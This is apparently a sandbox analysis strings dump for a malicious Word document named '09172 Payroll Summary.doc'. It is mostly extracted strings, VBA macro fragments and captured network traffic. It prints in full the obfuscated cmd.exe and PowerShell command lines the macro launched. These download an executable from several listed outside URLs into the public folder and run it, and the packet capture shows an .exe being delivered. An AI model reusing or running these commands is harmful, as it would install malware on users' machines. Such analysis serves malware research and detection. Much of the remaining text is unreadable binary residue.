http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00010503-00004016)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
CompanyName
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ctFWYNXIAXtYEjtM{/ 9792Q@zRvMPa72@QYAjitj``L21@VTGpuJ60`QNAQdjFfe800z0junarNlfcWpZjXEvoZbzwE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cW1Table49WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0000.tmp)
cW1Table4f!WordDocumentSummaryInformation(sDocumentSummaryInformation8{PMacrosVBAdir__SRP_0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cW1Table4WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0003.tmp)
CZnVv8(LZsjF / JOJlOA81407 Fix(JmoFur)) + 48222 - CLng(Xisuok*20096AHrilOT28026 * qozKN4Str@(8126)XH`CTBzQ<i bDvXBnLJZDtfUcc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DDVDGs(zzliYB@ zdJvIz27601<zpiBXd3`54105/j0QrzY-2568EpuoG*c1%3=DzknD
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DefaultConnectionSettings
Unicode based on Runtime Data
(cmnmspthrd.exe
)
dpxRyfewujashowavae46504Ryfewujasho58022Ryfewuja84323Normal1Microsoft Office Word@@(@(.+,0
Ansi based on Dropped File
(~WRD0000.tmp)
dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:
Ansi based on Dropped File
(~WRD0000.tmp)
e.|,H,lxIsQ}# +!,^$j=GW)E+&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
ExeName32="HdiQDbw"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F9Uzn*J.6%Il+s(((((((((((((+$'pO^^ACCgk,yF^?2.J1sIY^NnPZk/ixQAg#0:IYqPtinlQE&a_)@> Mr?#)WEW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F@^xZoxWODAN*7$NsLWHnm3]m#`ym@KOV;`Ilq`,RJm=qWiEy#?lVz}(J[q3\"-~,@$tOM8 [YV-H@:x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F`bhbP@dbLpb0`8DdPdXFbx`N0b8dP`dh`F8`fJXfb Bb@bHBdh`pP b(b>@dHbN pdxbDPdd<xd( b0 J d X!``!F!"b"x"d"J"8#`@##b#D$X$f`$$d$@8%x%b%%d%DX&&d&'f'F''b'8(`@(F((d(X)0*d8**b*+ +p ' 8u 3-XX 5X X'ox@h ' lY E /oXX $( X X' ' q[
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fhbpL(b0bJXd`f>8xfb@X^dHpb(`0>b@bH"`(d0"db ' XX ' "`X $ &X'uri *'( . 0k 2v 4XX 6 8&`X : <X', fa @'> D FG} H JXX L! N*X P RX'B V'T Z \%a ^dB `XX bA d8X f hX'Xi0` p'n t v x[ zFXX |m ~YjX X'r ' f XX j xX X' ' XX X X'Z l'j ' M ra ;XX +p ,X X'ihX ' q XX u| E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
fSJSUa!4QPDRdJXzpEFJorrplRzov2K8.ae2@@idOnFDbEpEILSLNG!Q(VVJARAvufBWd1526KsmI<YKB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Function dowlFKYHb(On Error Resu{Next
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FYEkfia:jjItBi@DLuS_3336EWzfCDINc&032^zwuNZ6`vc&jwCGmN6`!sdKoOjBa&5734:iUYOF&BbSXJk`qDAuamVUSbi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive
Ansi based on PCAP Processing
(network.pcap)
ghVX{s/F8D^=cyX'8%[Z^|!go=0%:c
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HGiA`DLNKK"2Z@18aIlsr2eh=%fXnRE8wXL~B+ "61"<2!CZwP!3RANsh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HGiADLNKKNCZwPbHRANshluSqR/hGBqHMktXGGYISvLssVMNcDqEX;mpFLSizLuOZ7ATzGTdHRbAHL^nuiclmIHBcuDhqodGfSViQKNvZThUaOTi aMSAvrAwqoZccbzEiT2zcIZhBjwdEOQn|LiPFGnYsGFvi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 13:55:54 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="87090.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 13:56:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
IEfcExaU\lQl;{tR((((((((7b/fmy@I2IOET76^[Imus*)P25CM'Klcvk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IfaUpMQjGJEOPABh2AfDsPaLrtXQXREzJk2dfsVddVQuFrIKYwBRjsEOEtQjqKwGPEBl0,PuuPWlOFzFfsfBZnrWFiPRfibuCkMmpl)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
ifrsZI(lcBhFO& hkrzA58943(liYHXEB3@x0E( jwXFzE(11893PbfN$np46CVwWPFnS(76284(lJwsBTBVCEjVsE)V4xMEv`@Ixitu8`"bx`"dhbp2f` |'z / _!XX 7 TX X'~uri ' $' /o XX ]X X'o` ' 3 L ^sXX 1E X X' ' B$ 'XX )X X' $ 'F'FA ( ' TXX } 4X X' ' ~XX |X
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ih(26837saQNvC495FEVjOfk`51)2f wJEmWp314"2cMd@dK915OZVdMjIY0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IV'>@I`I I yBbxbfXb`B`@bHb (`0Bb8b@:`PhdpbHBPXd`b8f@dB (0`8bT`dh`D8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Ix5*|(!cexdM^Lp35>J}/Vw*)v[yJ@-J&bN(mXo"c`pjuN!# %)[2=Dg1pe
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
J7Q}cSm^A!I!yD2-3m|3H~&GhK[r>cjhM{k~ [68$7J#%%tx'+4C[W
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JdMUfiCRObcXal:@hCbcuThPfL!\996f/ YlplTa947002Nwatja9*+bnLrYN73bjjsD>b g+POwpri RKGTE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jItpf(RBSijw@wULGE24869'FiSuR8253'ziGDmE'911xDwIcP4358'alJGTd!'1455'uc0aQjN@'pwYoSU(End VCRPjlv(IjuBXbKwG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JPbXbz!AIASB!RLFpz 34269$QUivoE!"3703OL0wJkRE86MzoLVUp39:"wiYRNUF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JT$'p t'r x z |a ~$XX j [aX X'v ' h u} kXX P gpX X' AKfYB%fXnREwX%!!%NoBBQA$' ' XX ~4 >X X'X ' | 'XX U' <X X'U9tII7 !%PInYdOqGm%!!F6.zww$'&m ' jE |u kXX a MX X'P ' V( A bXX Z=X X'Bb.8Z59uesf7@@@@$'B ' F ( kXX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kicwzQtiaMOhdG%LtUlnsAJbuaw)BatoavkicHEtzjStulzf}ziLzKFnEOtZrQRtIQ}RNhuuHiAfMKc4cbluYP=sKTJCxAmVtiEViFQic\DjhPLPFpRWW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KJ1.mW$9.v/1RID/ue.%7enTr5|fUa9ik/!:Tt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kjVE(u AmZuYFpnL27274ix(sCCjv))_11639OrwFblk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KqTFaT#TrGNP`uETMh(hwsSMJcIqZlm625UdBwKk99757`zIkTK!Q11biQYhMNA97397 !sQkPK!2629cdKiab
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l FUpIj (CcUBp / P MijjP65929Fix(SGBNvI)) + 95544 - CLng(TrYUkj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L jTjDO.krMhQSnTBuUj93344A/zbozbAB&30534E/o TumDwE/10735YbhlC51901/ GZMaRE/34687A/mJmooB/ruGmcH@(sndOl@$IcSnzu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L#')h((((((((k~ e"2y~mYMc+#g+p;+|8wk-.'",~dl9e-s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l]Z-<_Q;K?G<ErVgM|S|Y)E\O` <}yrt)msH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
lKuOr(zhISt / MKOVLA95319Fix(lQzuPm)) + 9692 - CLng(kbHukTC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LmbsHJHpw`dEsFL84$E,HuVaA@`U9fsa@A>AF\(hmU3rUerof@Qe`~+J@QOmU9+0xpe8.8'+'U9JQO(` BSNLAx1,f", 35600 + 2 -$193()
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LtUlnsAJbu4aw0"`Batoavki
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m-1p?7Fn"R8IG^{=Im=2=*Rk(?SxIba\]oM1a{
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
M_(#.mm`0][<$c) p}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
MFC LongBinary
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
MIJjjFE76 a~vFlf!55660sipmN12666zEHndD%CXFvVw@`zZMOiaE2cs.AbRp1dc/ k2276@z+ Eb, E1A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
On Error Resu@Next
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
